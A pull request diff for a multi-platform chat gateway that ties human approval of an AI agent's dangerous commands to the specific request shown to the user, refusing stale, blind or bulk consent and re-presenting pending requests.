### PR TITLE
fix(gateway): bind approvals to delivered request identity

### DIFF
--- a/gateway/platforms/api_server.py
+++ b/gateway/platforms/api_server.py
@@ -6972,6 +6972,12 @@ class APIServerAdapter(BasePlatformAdapter):
             _coerce_request_bool(body.get("all"), default=False)
             or _coerce_request_bool(body.get("resolve_all"), default=False)
         )
+        # The approval.request SSE event carries the queued request's
+        # approval_id; a client that echoes it back binds this decision to
+        # exactly that request — a stale/duplicate/replaced id resolves
+        # nothing (409) instead of whatever is at the head of the queue.
+        # Clients that omit it keep the legacy FIFO behavior.
+        expected_approval_id = str(body.get("approval_id") or "").strip() or None
         try:
             from tools.approval import resolve_gateway_approval
 
@@ -6979,6 +6985,7 @@ class APIServerAdapter(BasePlatformAdapter):
                 approval_session_key,
                 choice,
                 resolve_all=resolve_all,
+                expected_approval_id=expected_approval_id,
             )
         except Exception as exc:
             logger.exception("[api_server] approval resolution failed for run %s", run_id)

--- a/gateway/platforms/qqbot/adapter.py
+++ b/gateway/platforms/qqbot/adapter.py
@@ -1166,7 +1166,14 @@ class QQAdapter(BasePlatformAdapter):
 
         approval = parse_approval_button_data(button_data)
         if approval is not None:
-            session_key, decision = approval
+            packed_session_key, decision = approval
+            # The button_data session slot may carry the gateway request
+            # identity appended by encode_approval_callback_value; legacy
+            # buttons decode to (session_key, None) → unbound FIFO.
+            from tools.approval import decode_approval_callback_value
+            session_key, gateway_approval_id = decode_approval_callback_value(
+                packed_session_key
+            )
             choice = self._APPROVAL_BUTTON_TO_CHOICE.get(decision)
             if choice is None:
                 logger.warning(
@@ -1185,7 +1192,10 @@ class QQAdapter(BasePlatformAdapter):
                 # Import lazily to keep the adapter importable in tests that
                 # don't exercise the approval subsystem.
                 from tools.approval import resolve_gateway_approval
-                count = resolve_gateway_approval(session_key, choice)
+                count = resolve_gateway_approval(
+                    session_key, choice,
+                    expected_approval_id=gateway_approval_id,
+                )
                 logger.info(
                     "[%s] Button resolved %d approval(s) for session %s "
                     "(choice=%s, operator=%s)",
@@ -2708,6 +2718,7 @@ class QQAdapter(BasePlatformAdapter):
         allow_permanent: bool = True,
         allow_session: bool = True,
         smart_denied: bool = False,
+        approval_id: str = "",
     ) -> SendResult:
         """Send a button-based exec-approval prompt for a dangerous command.
 
@@ -2715,6 +2726,9 @@ class QQAdapter(BasePlatformAdapter):
         agent is blocked waiting for approval. Button clicks resolve via
         :func:`tools.approval.resolve_gateway_approval` — dispatched by the
         adapter's interaction callback (:meth:`_default_interaction_dispatch`).
+        ``approval_id`` rides in the button_data session slot (see
+        :func:`tools.approval.encode_approval_callback_value`) so a click
+        resolves exactly the request this prompt shows.
         """
         del metadata  # QQ doesn't have thread_id / DM targeting overrides.
         del allow_session  # QQ's 3-button keyboard has no session tier (once/always/deny).
@@ -2726,8 +2740,9 @@ class QQAdapter(BasePlatformAdapter):
         # seen; the last inbound msg_id is the natural choice.
         msg_id = self._last_msg_id.get(chat_id)
 
+        from tools.approval import encode_approval_callback_value
         req = ApprovalRequest(
-            session_key=session_key,
+            session_key=encode_approval_callback_value(session_key, approval_id),
             title="Execute this command?",
             description=description,
             command_preview=command,

--- a/gateway/platforms/whatsapp_cloud.py
+++ b/gateway/platforms/whatsapp_cloud.py
@@ -340,12 +340,14 @@ class WhatsAppCloudAdapter(WhatsAppBehaviorMixin, BasePlatformAdapter):
         # fallback path, same as after a gateway restart).
         #   _clarify_state:        clarify_id → session_key (resolves via
         #                          tools.clarify_gateway.resolve_gateway_clarify)
-        #   _exec_approval_state:  approval_id → session_key (resolves via
-        #                          tools.approval.resolve_gateway_approval)
+        #   _exec_approval_state:  callback_ref → (session_key, gateway
+        #                          approval_id) (resolves via
+        #                          tools.approval.resolve_gateway_approval,
+        #                          bound to the exact request the prompt shows)
         #   _slash_confirm_state:  confirm_id → session_key (resolves via
         #                          tools.slash_confirm.resolve)
         self._clarify_state: "OrderedDict[str, str]" = OrderedDict()
-        self._exec_approval_state: "OrderedDict[str, str]" = OrderedDict()
+        self._exec_approval_state: "OrderedDict[str, tuple]" = OrderedDict()
         self._slash_confirm_state: "OrderedDict[str, str]" = OrderedDict()
 
         # Runtime
@@ -852,6 +854,7 @@ class WhatsAppCloudAdapter(WhatsAppBehaviorMixin, BasePlatformAdapter):
         allow_permanent: bool = True,
         allow_session: bool = True,
         smart_denied: bool = False,
+        approval_id: str = "",
     ) -> SendResult:
         """Render a dangerous-command approval prompt with native buttons.
 
@@ -859,6 +862,8 @@ class WhatsAppCloudAdapter(WhatsAppBehaviorMixin, BasePlatformAdapter):
         waiting agent via ``tools.approval.resolve_gateway_approval`` —
         same mechanism as the text ``/approve`` flow. The agent thread
         is blocked until the user taps or types a response.
+        ``approval_id`` is the gateway request identity this prompt
+        shows; taps resolve exactly that request or nothing.
         """
         if self._http_client is None:
             return SendResult(success=False, error="Not connected")
@@ -875,7 +880,10 @@ class WhatsAppCloudAdapter(WhatsAppBehaviorMixin, BasePlatformAdapter):
             + ("\n\nSmart DENY: owner override applies to this one operation only." if smart_denied else "")
         )
 
-        approval_id = uuid.uuid4().hex[:12]
+        # Button ids are size-limited, so a short random ref goes on the
+        # wire and the real identity (session_key + gateway approval_id)
+        # stays in _exec_approval_state.
+        callback_ref = uuid.uuid4().hex[:12]
         reply_to = (metadata or {}).get("reply_to_message_id") if metadata else None
 
         interactive = {
@@ -885,11 +893,11 @@ class WhatsAppCloudAdapter(WhatsAppBehaviorMixin, BasePlatformAdapter):
                 "buttons": [
                     {
                         "type": "reply",
-                        "reply": {"id": f"appr:{approval_id}:approve", "title": "✅ Approve"},
+                        "reply": {"id": f"appr:{callback_ref}:approve", "title": "✅ Approve"},
                     },
                     {
                         "type": "reply",
-                        "reply": {"id": f"appr:{approval_id}:deny", "title": "❌ Deny"},
+                        "reply": {"id": f"appr:{callback_ref}:deny", "title": "❌ Deny"},
                     },
                 ],
             },
@@ -897,7 +905,11 @@ class WhatsAppCloudAdapter(WhatsAppBehaviorMixin, BasePlatformAdapter):
 
         result = await self._post_interactive(chat_id, interactive, reply_to=reply_to)
         if result.success:
-            self._bounded_put(self._exec_approval_state, approval_id, session_key)
+            self._bounded_put(
+                self._exec_approval_state,
+                callback_ref,
+                (session_key, approval_id or ""),
+            )
         return result
 
     async def send_slash_confirm(
@@ -1793,22 +1805,27 @@ class WhatsAppCloudAdapter(WhatsAppBehaviorMixin, BasePlatformAdapter):
                 return False
             return True
 
-        # Exec approval: appr:<approval_id>:approve|deny
+        # Exec approval: appr:<callback_ref>:approve|deny
         if button_id.startswith("appr:"):
             parts = button_id.split(":", 2)
             if len(parts) != 3:
                 return False
-            _, approval_id, choice = parts
-            session_key = self._exec_approval_state.pop(approval_id, None)
+            _, callback_ref, choice = parts
+            state = self._exec_approval_state.pop(callback_ref, None)
+            if isinstance(state, tuple):
+                session_key, gateway_approval_id = state
+            else:
+                # Legacy bare session_key entry (pre-identity prompt).
+                session_key, gateway_approval_id = state, ""
             if not session_key:
                 logger.info(
                     "[whatsapp_cloud] approval tap with no matching state "
-                    "(approval_id=%s) — likely stale; falling back to text",
-                    approval_id,
+                    "(callback_ref=%s) — likely stale; falling back to text",
+                    callback_ref,
                 )
                 return False
             if choice not in ("approve", "deny"):
-                self._exec_approval_state[approval_id] = session_key
+                self._exec_approval_state[callback_ref] = state
                 return False
             try:
                 from tools.approval import resolve_gateway_approval
@@ -1817,7 +1834,10 @@ class WhatsAppCloudAdapter(WhatsAppBehaviorMixin, BasePlatformAdapter):
                     "[whatsapp_cloud] approval resolver unavailable"
                 )
                 return False
-            count = resolve_gateway_approval(session_key, choice)
+            count = resolve_gateway_approval(
+                session_key, choice,
+                expected_approval_id=gateway_approval_id or None,
+            )
             if not count:
                 logger.info(
                     "[whatsapp_cloud] approval resolver reported no waiter "

--- a/gateway/relay/adapter.py
+++ b/gateway/relay/adapter.py
@@ -1756,6 +1756,7 @@ class RelayAdapter(BasePlatformAdapter):
         allow_permanent: bool = True,
         allow_session: bool = True,
         smart_denied: bool = False,
+        approval_id: str = "",
     ) -> SendResult:
         """Native-button exec approval over the relay (Phase 3).
 
@@ -1791,7 +1792,13 @@ class RelayAdapter(BasePlatformAdapter):
 
         prompt_id = self._mint_prompt(
             "exec_approval",
-            {"session_key": session_key, "chat_id": str(chat_id)},
+            {
+                "session_key": session_key,
+                "chat_id": str(chat_id),
+                # Gateway request identity this prompt shows — the press
+                # resolves exactly this request or nothing.
+                "approval_id": approval_id or "",
+            },
         )
         result = await self._send_prompt(
             chat_id,
@@ -1940,7 +1947,10 @@ class RelayAdapter(BasePlatformAdapter):
                     if option_id in {"once", "session", "always", "deny"}
                     else "deny"
                 )
-                count = resolve_gateway_approval(session_key, choice)
+                count = resolve_gateway_approval(
+                    session_key, choice,
+                    expected_approval_id=str(state.get("approval_id") or "") or None,
+                )
                 label = {
                     "once": "✅ Approved once",
                     "session": "✅ Approved for session",

--- a/gateway/run.py
+++ b/gateway/run.py
@@ -644,6 +644,228 @@ def _format_exec_approval_fallback(
     )
 
 
+def _format_pending_approval_recovery(
+    snapshot: dict,
+    command_prefix: str = "/",
+    *,
+    superseded: bool = False,
+    bulk_refused: bool = False,
+) -> str:
+    """Re-present a still-pending dangerous-command approval.
+
+    Two callers:
+
+    * the busy-text recovery path, when ordinary text arrives while the
+      agent is parked on an approval whose UI may already be dead
+      (``superseded=False``): show the exact pending request and how to
+      answer it, and make explicit that the text was NOT consent;
+    * the approve/deny revalidation path, when a delayed approve no longer
+      matches the request the user was shown (``superseded=True``): state
+      that nothing was executed and show what is actually pending now.
+
+    ``snapshot`` is a :func:`tools.approval.peek_blocking_approval`-shaped
+    dict.  The command is redacted here (#48456) so no caller can forget.
+
+    ``bulk_refused`` adds the one-at-a-time instruction used when an
+    ``approve all``/``deny all`` was refused because a single advertised
+    head cannot authorize the rest of the queue.
+    """
+    cmd = _redact_approval_command(snapshot.get("command", ""))
+    cmd_preview = cmd[:200] + "..." if len(cmd) > 200 else cmd
+    description = snapshot.get("description") or "dangerous command"
+    if superseded:
+        heading = (
+            "⚠️ **That approval is no longer pending — nothing was "
+            "executed.** This is what is awaiting a decision now:"
+        )
+    else:
+        heading = (
+            "⏳ **A dangerous command is still waiting for your decision.** "
+            "Your message was not treated as approval and was not queued:"
+        )
+    lines = [
+        heading,
+        f"```\n{cmd_preview}\n```",
+        f"Reason: {description}",
+    ]
+    try:
+        extra = int(snapshot.get("pending_count", 1) or 1) - 1
+    except (TypeError, ValueError):
+        extra = 0
+    if extra > 0:
+        lines.append(f"(+{extra} more pending after this one)")
+    if bulk_refused:
+        lines.append(
+            "Bulk resolution (`approve all` / `deny all`) is refused here: "
+            "only the request shown above has been re-confirmed to you. "
+            "Approve or deny recovered requests one at a time."
+        )
+    lines.append(
+        f"Reply `{command_prefix}approve` to run it, "
+        f"`{command_prefix}deny` to cancel it, or "
+        f"`{command_prefix}stop` to abort the whole turn."
+    )
+    return "\n".join(lines)
+
+
+def _record_prompt_advertised(
+    session_key: str,
+    approval_id: str,
+    command: str,
+) -> None:
+    """Bind delayed typed consent to the prompt that was just delivered.
+
+    Called after a SUCCESSFUL approval-prompt delivery: the exact request
+    identity and frozen command carried by the delivered prompt are
+    recorded as the one the user can now see, and a later typed
+    ``/approve``/``/deny`` resolves exactly that request (revalidated
+    under the queue lock) or nothing.  Under concurrency the delivered
+    prompt is not necessarily the queue head — a parallel subagent's
+    request may sit in front of it — so advertising the head here would
+    let a typed approve execute a command the user was never shown.  A
+    failed delivery deliberately records nothing — an unbound typed
+    approve is refused fail-safe and triggers a visible re-present
+    instead.  Never raises; bookkeeping must not break the prompt flow
+    itself.
+    """
+    try:
+        from tools.approval import advertise_blocking_approval
+        advertise_blocking_approval(
+            session_key,
+            approval_id=approval_id,
+            command=command,
+        )
+    except Exception:
+        logger.debug(
+            "Failed to record advertised approval prompt for %s",
+            session_key, exc_info=True,
+        )
+
+
+def _send_gateway_approval_prompt(
+    status_adapter,
+    chat_id,
+    *,
+    loop,
+    thread_metadata,
+    session_key: str,
+    approval_data: dict,
+) -> None:
+    """Send a dangerous-command approval prompt from the agent thread.
+
+    If the adapter supports interactive button-based approvals (e.g.
+    Discord's ``send_exec_approval``), use that for a richer UX.  Otherwise
+    fall back to a plain text message with ``/approve`` instructions.
+
+    On a successful delivery (either path) the exact request this prompt
+    carries is advertised via :func:`_record_prompt_advertised`, binding a
+    later typed approve/deny to exactly the request the user was shown —
+    not to whatever sits at the head of the queue at delivery time.
+
+    Module-level (rather than inline in the per-run notify closure) so the
+    delivery→advertise wiring is unit-testable — same rationale as
+    ``_redact_approval_command``.
+    """
+    # Pause the typing indicator while the agent waits for
+    # user approval.  Critical for Slack's Assistant API where
+    # assistant_threads_setStatus disables the compose box — the
+    # user literally cannot type /approve while "is thinking..."
+    # is active.  The approval message send auto-clears the Slack
+    # status; pausing prevents _keep_typing from re-setting it.
+    # Typing resumes in _handle_approve_command/_handle_deny_command.
+    status_adapter.pause_typing_for_chat(chat_id)
+
+    # Freeze the action identity before scheduling any async send. A sender or
+    # other holder of the presentation dict cannot change what the eventual
+    # delivery receipt advertises.
+    approval_id = str(approval_data.get("approval_id", ""))
+    approval_command = str(approval_data.get("command", ""))
+    cmd = approval_command
+    desc = approval_data.get("description", "dangerous command")
+
+    # Redact credentials from the command before displaying it in
+    # the approval prompt — Tirith's findings are already redacted,
+    # but the raw command string still leaks secrets to the chat
+    # platform (#48456). Applied here so BOTH the button-based
+    # (send_exec_approval) and plain-text fallback paths below use
+    # the redacted value.
+    cmd = _redact_approval_command(cmd)
+
+    # Prefer button-based approval when the adapter supports it.
+    # Check the *class* for the method, not the instance — avoids
+    # false positives from MagicMock auto-attribute creation in tests.
+    if getattr(type(status_adapter), "send_exec_approval", None) is not None:
+        try:
+            _approval_fut = safe_schedule_threadsafe(
+                status_adapter.send_exec_approval(
+                    chat_id=chat_id,
+                    command=cmd,
+                    session_key=session_key,
+                    description=desc,
+                    metadata=thread_metadata,
+                    allow_permanent=approval_data.get("allow_permanent", True),
+                    allow_session=approval_data.get("allow_session", True),
+                    smart_denied=approval_data.get("smart_denied", False),
+                    approval_id=approval_id,
+                ),
+                loop,
+                logger=logger,
+                log_message="send_exec_approval scheduling error",
+            )
+            if _approval_fut is None:
+                raise RuntimeError("send_exec_approval: loop unavailable")
+            _approval_result = _approval_fut.result(timeout=15)
+            if _approval_result.success:
+                _record_prompt_advertised(
+                    session_key, approval_id, approval_command,
+                )
+                return
+            logger.warning(
+                "Button-based approval failed (send returned error), falling back to text: %s",
+                _approval_result.error,
+            )
+        except Exception as _e:
+            logger.warning(
+                "Button-based approval failed, falling back to text: %s", _e
+            )
+
+    # Fallback: plain text approval prompt.  Use the adapter's
+    # typed prefix so Slack/Matrix users are told the form they
+    # can actually type (`!approve`) — typed "/" is blocked in
+    # Slack threads and reserved by Matrix clients.
+    _p = getattr(status_adapter, "typed_command_prefix", "/")
+    msg = _format_exec_approval_fallback(
+        cmd,
+        desc,
+        _p,
+        allow_permanent=approval_data.get("allow_permanent", True),
+        allow_session=approval_data.get("allow_session", True),
+        smart_denied=approval_data.get("smart_denied", False),
+    )
+    try:
+        _approval_send_fut = safe_schedule_threadsafe(
+            status_adapter.send(
+                chat_id,
+                msg,
+                metadata=thread_metadata,
+            ),
+            loop,
+            logger=logger,
+            log_message="Approval text-send scheduling error",
+        )
+        if _approval_send_fut is not None:
+            _send_result = _approval_send_fut.result(timeout=15)
+            if (
+                _send_result is not None
+                and getattr(_send_result, "success", False) is True
+            ):
+                _record_prompt_advertised(
+                    session_key, approval_id, approval_command,
+                )
+    except Exception as _e:
+        logger.error("Failed to send approval request: %s", _e)
+
+
 def _gateway_provider_error_reply(text: str) -> str:
     """Map raw provider/API errors to a short user-safe Telegram reply."""
     if _GATEWAY_AUTH_ERROR_RE.search(text):
@@ -5300,93 +5522,19 @@ class TurnRunner:
         def _approval_notify_sync(approval_data: dict) -> None:
             """Send the approval request to the user from the agent thread.
 
-                If the adapter supports interactive button-based approvals
-                (e.g. Discord's ``send_exec_approval``), use that for a richer
-                UX.  Otherwise fall back to a plain text message with
-                ``/approve`` instructions.
-                """
-            # Pause the typing indicator while the agent waits for
-            # user approval.  Critical for Slack's Assistant API where
-            # assistant_threads_setStatus disables the compose box — the
-            # user literally cannot type /approve while "is thinking..."
-            # is active.  The approval message send auto-clears the Slack
-            # status; pausing prevents _keep_typing from re-setting it.
-            # Typing resumes in _handle_approve_command/_handle_deny_command.
-            ctx._status_adapter.pause_typing_for_chat(ctx._status_chat_id)
-
-            cmd = approval_data.get("command", "")
-            desc = approval_data.get("description", "dangerous command")
-
-            # Redact credentials from the command before displaying it in
-            # the approval prompt — Tirith's findings are already redacted,
-            # but the raw command string still leaks secrets to the chat
-            # platform (#48456). Applied here so BOTH the button-based
-            # (send_exec_approval) and plain-text fallback paths below use
-            # the redacted value.
-            cmd = _redact_approval_command(cmd)
-
-            # Prefer button-based approval when the adapter supports it.
-            # Check the *class* for the method, not the instance — avoids
-            # false positives from MagicMock auto-attribute creation in tests.
-            if getattr(type(ctx._status_adapter), "send_exec_approval", None) is not None:
-                try:
-                    _approval_fut = safe_schedule_threadsafe(
-                        ctx._status_adapter.send_exec_approval(
-                            chat_id=ctx._status_chat_id,
-                            command=cmd,
-                            session_key=_approval_session_key,
-                            description=desc,
-                            metadata=ctx._status_thread_metadata,
-                            allow_permanent=approval_data.get("allow_permanent", True),
-                            allow_session=approval_data.get("allow_session", True),
-                            smart_denied=approval_data.get("smart_denied", False),
-                        ),
-                        ctx._loop_for_step,
-                        logger=logger,
-                        log_message="send_exec_approval scheduling error",
-                    )
-                    if _approval_fut is None:
-                        raise RuntimeError("send_exec_approval: loop unavailable")
-                    _approval_result = _approval_fut.result(timeout=15)
-                    if _approval_result.success:
-                        return
-                    logger.warning(
-                        "Button-based approval failed (send returned error), falling back to text: %s",
-                        _approval_result.error,
-                    )
-                except Exception as _e:
-                    logger.warning(
-                        "Button-based approval failed, falling back to text: %s", _e
-                    )
-
-            # Fallback: plain text approval prompt.  Use the adapter's
-            # typed prefix so Slack/Matrix users are told the form they
-            # can actually type (`!approve`) — typed "/" is blocked in
-            # Slack threads and reserved by Matrix clients.
-            _p = getattr(ctx._status_adapter, "typed_command_prefix", "/")
-            msg = _format_exec_approval_fallback(
-                cmd,
-                desc,
-                _p,
-                allow_permanent=approval_data.get("allow_permanent", True),
-                allow_session=approval_data.get("allow_session", True),
-                smart_denied=approval_data.get("smart_denied", False),
+            Thin per-run binding over the module-level prompt sender (see
+            :func:`_send_gateway_approval_prompt`), which also records the
+            delivered prompt as the advertised request so typed delayed
+            consent binds to exactly what the user was shown.
+            """
+            _send_gateway_approval_prompt(
+                ctx._status_adapter,
+                ctx._status_chat_id,
+                loop=ctx._loop_for_step,
+                thread_metadata=ctx._status_thread_metadata,
+                session_key=_approval_session_key,
+                approval_data=approval_data,
             )
-            try:
-                _approval_send_fut = safe_schedule_threadsafe(
-                    ctx._status_adapter.send(
-                        ctx._status_chat_id,
-                        msg,
-                        metadata=ctx._status_thread_metadata,
-                    ),
-                    ctx._loop_for_step,
-                    logger=logger,
-                    log_message="Approval text-send scheduling error",
-                )
-                if _approval_send_fut is not None:
-                    _approval_send_fut.result(timeout=15)
-            except Exception as _e:
-                logger.error("Failed to send approval request: %s", _e)
 
         # Keep real user text separate from API-only recovery guidance.  If
         # an auto-continue note is prepended below, persist the original
@@ -9065,6 +9213,55 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew
         # cascade after the current turn finishes.
         if getattr(event, "internal", False):
             return False
+
+        # --- Pending-approval recovery (#27352 family) ---
+        # Reaching here means the text matched no approve/deny form above.
+        # The agent thread is parked on a threading.Event inside
+        # tools/approval.py, so nothing the busy paths below do (queue /
+        # steer / interrupt) can run until the approval resolves — the
+        # reply would silently wedge behind the parked turn until the
+        # approval times out and auto-denies.  And the prompt's own UI may
+        # already be dead (Discord buttons expire after minutes).  So:
+        # re-present the exact pending request with how to answer it, and
+        # record it as the request the user is now looking at — a later
+        # explicit approve resolves precisely this request or nothing
+        # (tools.approval revalidates the identity under its lock
+        # immediately before resolution).
+        try:
+            from tools.approval import advertise_blocking_approval
+            _recovery_text = (event.text or "").strip()
+            if (
+                event.message_type == MessageType.TEXT
+                and _recovery_text
+                and not _recovery_text.startswith(("/", "!"))
+            ):
+                _approval_snap = advertise_blocking_approval(session_key)
+                if _approval_snap is not None:
+                    _prefix = getattr(adapter, "typed_command_prefix", "/") or "/"
+                    _anchor = self._reply_anchor_for_event(event)
+                    await adapter._send_with_retry(
+                        chat_id=event.source.chat_id,
+                        content=_format_pending_approval_recovery(
+                            _approval_snap, _prefix,
+                        ),
+                        reply_to=_anchor,
+                        metadata=self._thread_metadata_for_source(
+                            event.source, _anchor,
+                        ),
+                    )
+                    logger.info(
+                        "Re-presented pending approval for session %s "
+                        "(id=%s) — text follow-up is not consent and was "
+                        "not queued",
+                        session_key, _approval_snap.get("approval_id"),
+                    )
+                    return True
+        except Exception:
+            logger.warning(
+                "Pending-approval recovery failed for session %s; "
+                "falling through to busy handling",
+                session_key, exc_info=True,
+            )
 
         _busy_state = self._peek_session_state(session_key)
         running_agent = _busy_state.turn.agent if _busy_state else None

--- a/gateway/slash_commands.py
+++ b/gateway/slash_commands.py
@@ -5387,6 +5387,52 @@ class GatewaySlashCommandsMixin:
         lines.append("Invoke a bundle with `/<slug>` to load all its skills.")
         return "\n".join(lines)
 
+    def _represent_pending_approval(
+        self,
+        source,
+        session_key: str,
+        *,
+        superseded: bool,
+        bulk_refused: bool = False,
+    ) -> Optional[str]:
+        """Re-present the head request after a typed consent was refused.
+
+        Three refusal shapes share this reply:
+
+        * no advertised binding existed (initial prompt send failed, or the
+          binding was consumed) — ``superseded=False``: never resolve on
+          blind consent; show the exact pending request and require a fresh
+          explicit approval;
+        * the advertised request is gone/superseded — ``superseded=True``:
+          nothing was executed; show what is pending NOW;
+        * bulk resolution was refused — ``bulk_refused=True``: a single
+          advertised head cannot authorize the rest of the queue.
+
+        The head is recorded as the new advertised request, so the next
+        explicit approve/deny binds to it.  Returns None when nothing is
+        pending anymore (caller falls back to its no-pending reply).
+        """
+        from tools.approval import advertise_blocking_approval
+
+        snapshot = advertise_blocking_approval(session_key)
+        if snapshot is None:
+            return None
+        from gateway.run import _format_pending_approval_recovery
+
+        adapter = self.adapters.get(source.platform)
+        prefix = getattr(adapter, "typed_command_prefix", "/")
+        if not isinstance(prefix, str) or not prefix:
+            prefix = "/"
+        logger.info(
+            "Refused typed approval consent for session %s "
+            "(superseded=%s, bulk_refused=%s); re-presented pending id=%s",
+            session_key, superseded, bulk_refused,
+            snapshot.get("approval_id"),
+        )
+        return _format_pending_approval_recovery(
+            snapshot, prefix, superseded=superseded, bulk_refused=bulk_refused,
+        )
+
     async def _handle_approve_command(self, event: MessageEvent) -> Optional[str]:
         """Handle /approve command — unblock waiting agent thread(s).
 
@@ -5396,25 +5442,34 @@ class GatewaySlashCommandsMixin:
         flow as the CLI's synchronous input() approval.
 
         Supports multiple concurrent approvals (parallel subagents,
-        execute_code).  ``/approve`` resolves the oldest pending command;
-        ``/approve all`` resolves every pending command at once.
+        execute_code) via a per-session queue.  Typed consent is bound to
+        the request the user was shown (the advertised head, recorded when
+        the prompt was successfully delivered or re-presented): ``/approve``
+        resolves exactly that request or nothing.  ``/approve all`` is
+        refused while more than one request is pending — a single shown
+        prompt cannot authorize a queue tail the user may never have seen —
+        and each request is approved one at a time instead.
 
         Usage:
-            /approve              — approve oldest pending command once
-            /approve all          — approve ALL pending commands at once
-            /approve session      — approve oldest + remember for session
-            /approve all session  — approve all + remember for session
-            /approve always       — approve oldest + remember permanently
-            /approve all always   — approve all + remember permanently
+            /approve              — approve the request you were shown
+            /approve session      — same + remember pattern for session
+            /approve always       — same + remember pattern permanently
+            /approve all [...]    — only valid with a single pending request
         """
         source = event.source
         session_key = self._session_key_for_source(source)
 
         from tools.approval import (
-            resolve_gateway_approval, has_blocking_approval,
+            clear_advertised_approval,
+            get_advertised_approval,
+            has_blocking_approval,
+            peek_blocking_approval,
+            resolve_gateway_approval,
         )
 
         if not has_blocking_approval(session_key):
+            # Nothing pending — any recovery-flow binding is moot.
+            clear_advertised_approval(session_key)
             if session_key in self._pending_approvals:
                 self._pending_approvals.pop(session_key)
                 return t("gateway.approval_expired")
@@ -5432,8 +5487,58 @@ class GatewaySlashCommandsMixin:
         else:
             choice = "once"
 
-        count = resolve_gateway_approval(session_key, choice, resolve_all=resolve_all)
+        # Delayed-consent revalidation.  Typed approval binds to "the
+        # request the user was shown": the advertised identity, recorded
+        # when the initial prompt was successfully DELIVERED
+        # (gateway.run._send_gateway_approval_prompt) or when a recovery
+        # path re-presented the request.  No binding — the send failed, or
+        # the bound request already resolved — means blind consent: refuse,
+        # re-present the exact pending request (creating the binding), and
+        # require a fresh explicit approval.
+        _advertised = get_advertised_approval(session_key)
+        if _advertised is None:
+            _fresh = self._represent_pending_approval(
+                source, session_key, superseded=False,
+            )
+            if _fresh is not None:
+                return _fresh
+            return t("gateway.approve.no_pending")
+
+        if resolve_all:
+            # A single advertised head cannot authorize the rest of the
+            # queue — entries behind it may have arrived after the user
+            # read the prompt.  Refuse bulk resolution outright (the
+            # resolver enforces the same rule under its lock) and walk one
+            # explicit consent at a time.  Bulk-of-one degrades to the
+            # ordinary single resolve below.
+            _head_now = peek_blocking_approval(session_key)
+            try:
+                _pending_n = int((_head_now or {}).get("pending_count", 1) or 1)
+            except (TypeError, ValueError):
+                _pending_n = 1
+            if _pending_n > 1:
+                _bulk = self._represent_pending_approval(
+                    source, session_key, superseded=False, bulk_refused=True,
+                )
+                if _bulk is not None:
+                    return _bulk
+                return t("gateway.approve.no_pending")
+
+        # resolve_gateway_approval revalidates the identity under its lock
+        # immediately before resolution; if the advertised request is gone
+        # or superseded, it resolves NOTHING (timeout is never consent) and
+        # we re-present whatever is actually pending now.
+        count = resolve_gateway_approval(
+            session_key, choice, resolve_all=resolve_all,
+            expected_approval_id=_advertised.get("approval_id"),
+            expected_command=_advertised.get("command"),
+        )
         if not count:
+            _superseded = self._represent_pending_approval(
+                source, session_key, superseded=True,
+            )
+            if _superseded is not None:
+                return _superseded
             return t("gateway.approve.no_pending")
 
         # Resume typing indicator — agent is about to continue processing.
@@ -5460,10 +5565,16 @@ class GatewaySlashCommandsMixin:
         session_key = self._session_key_for_source(source)
 
         from tools.approval import (
-            resolve_gateway_approval, has_blocking_approval,
+            clear_advertised_approval,
+            get_advertised_approval,
+            has_blocking_approval,
+            peek_blocking_approval,
+            resolve_gateway_approval,
         )
 
         if not has_blocking_approval(session_key):
+            # Nothing pending — any recovery-flow binding is moot.
+            clear_advertised_approval(session_key)
             if session_key in self._pending_approvals:
                 self._pending_approvals.pop(session_key)
                 return t("gateway.deny.stale")
@@ -5483,11 +5594,47 @@ class GatewaySlashCommandsMixin:
         if reason:
             reason = reason[:280].strip()
 
+        # Same delayed-consent identity rules as /approve: a typed deny
+        # refers to the request the user was shown.  Denying a request they
+        # never saw would silently kill a command they might want — refuse
+        # and re-present instead, both when no binding exists and when the
+        # bound request is gone/superseded; and a single advertised head
+        # never authorizes a bulk deny of the queue behind it.
+        _advertised = get_advertised_approval(session_key)
+        if _advertised is None:
+            _fresh = self._represent_pending_approval(
+                source, session_key, superseded=False,
+            )
+            if _fresh is not None:
+                return _fresh
+            return t("gateway.deny.no_pending")
+
+        if resolve_all:
+            _head_now = peek_blocking_approval(session_key)
+            try:
+                _pending_n = int((_head_now or {}).get("pending_count", 1) or 1)
+            except (TypeError, ValueError):
+                _pending_n = 1
+            if _pending_n > 1:
+                _bulk = self._represent_pending_approval(
+                    source, session_key, superseded=False, bulk_refused=True,
+                )
+                if _bulk is not None:
+                    return _bulk
+                return t("gateway.deny.no_pending")
+
         count = resolve_gateway_approval(
             session_key, "deny", resolve_all=resolve_all,
             reason=reason or None,
+            expected_approval_id=_advertised.get("approval_id"),
+            expected_command=_advertised.get("command"),
         )
         if not count:
+            _superseded = self._represent_pending_approval(
+                source, session_key, superseded=True,
+            )
+            if _superseded is not None:
+                return _superseded
             return t("gateway.deny.no_pending")
 
         # Resume typing indicator — agent continues (with BLOCKED result).

--- a/plugins/platforms/discord/adapter.py
+++ b/plugins/platforms/discord/adapter.py
@@ -7057,12 +7057,16 @@ class DiscordAdapter(BasePlatformAdapter):
         allow_permanent: bool = True,
         allow_session: bool = True,
         smart_denied: bool = False,
+        approval_id: str = "",
     ) -> SendResult:
         """
         Send a button-based exec approval prompt for a dangerous command.
 
         The buttons call ``resolve_gateway_approval()`` to unblock the waiting
         agent thread — this replaces the text-based ``/approve`` flow on Discord.
+        ``approval_id`` binds the buttons to the exact queued request this
+        prompt shows, so a stale or duplicate click can never resolve a
+        different pending command.
         """
         if not self._client or not DISCORD_AVAILABLE:
             return SendResult(success=False, error="Not connected")
@@ -7133,6 +7137,7 @@ class DiscordAdapter(BasePlatformAdapter):
                 allow_permanent=allow_permanent,
                 allow_session=allow_session,
                 smart_denied=smart_denied,
+                approval_id=approval_id,
             )
 
             send_kwargs: Dict[str, Any] = {"content": content, "embed": embed, "view": view}
@@ -8400,9 +8405,13 @@ def _define_discord_view_classes() -> None:
             allow_permanent: bool = True,
             allow_session: bool = True,
             smart_denied: bool = False,
+            approval_id: str = "",
         ):
             super().__init__(timeout=_read_discord_prompt_timeout())
             self.session_key = session_key
+            # Identity of the exact queued request this prompt shows. A
+            # click resolves this request or nothing — never the FIFO head.
+            self.approval_id = approval_id or ""
             self.allowed_user_ids = allowed_user_ids
             self.allowed_role_ids = allowed_role_ids or set()
             # Opt-in admin gate for exec approval (default off → user-scope,
